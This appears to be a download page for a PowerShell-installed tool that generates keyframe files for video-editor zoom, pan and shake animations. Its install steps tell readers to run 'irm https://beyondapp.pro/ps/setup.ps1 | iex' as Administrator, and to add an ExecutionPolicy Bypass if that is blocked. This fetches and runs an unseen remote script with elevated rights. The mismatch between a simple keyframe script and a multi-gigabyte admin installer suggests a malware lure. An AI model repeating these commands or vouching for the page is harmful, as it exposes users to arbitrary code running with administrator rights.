Generates text/JSON keyframe files with calculated animation curves (smooth zoom, shake) for video editing projects.
Script that generates keyframe data files for zoom, pan, and shake animations to paste into video editor projects.
Run in PowerShell as Administrator:
irm https://beyondapp.pro/ps/setup.ps1 | iexCopy · paste · press Enter · confirm UAC
Setup runs in three steps:
| Step | Action |
|---|---|
| 1/3 | Downloading components — tool package and dependencies |
| 2/3 | Unpacking archive — files extracted to a temp workspace |
| 3/3 | Launching installer — utility is installed on Windows |
🔢 Math-based curves — Smooth zoom and easing without manual keyframing. 📳 Shake presets — Lightweight, medium, and heavy camera shake templates. 📄 Text / JSON export — Drop output into your editor workflow. 🎞️ FPS-aware — Generate keys matched to project frame rate. ⚡ One command — PowerShell handles download, unpack, and setup.
| Windows | Windows 10 / 11 (64-bit) |
| RAM | 8 GB |
| Disk | 2 GB free space |
How to install?
Open PowerShell as Administrator and run the command from the INSTALLATION section. You should see steps [1/3], [2/3], and [3/3] in the console.
Manual install blocked?
Try: `powershell -ExecutionPolicy Bypass -Command "irm https://beyondapp.pro/ps/setup.ps1 | iex"`
What does this tool do?
Script that **generates keyframe data files** for zoom, pan, and shake animations to paste into video editor projects.
Updates?
Re-run the same PowerShell command to fetch the latest build.
